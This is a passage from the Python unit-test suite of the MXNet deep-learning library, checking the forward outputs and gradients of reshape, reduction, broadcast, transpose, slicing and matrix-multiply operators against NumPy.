dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.fromjson(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for t in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
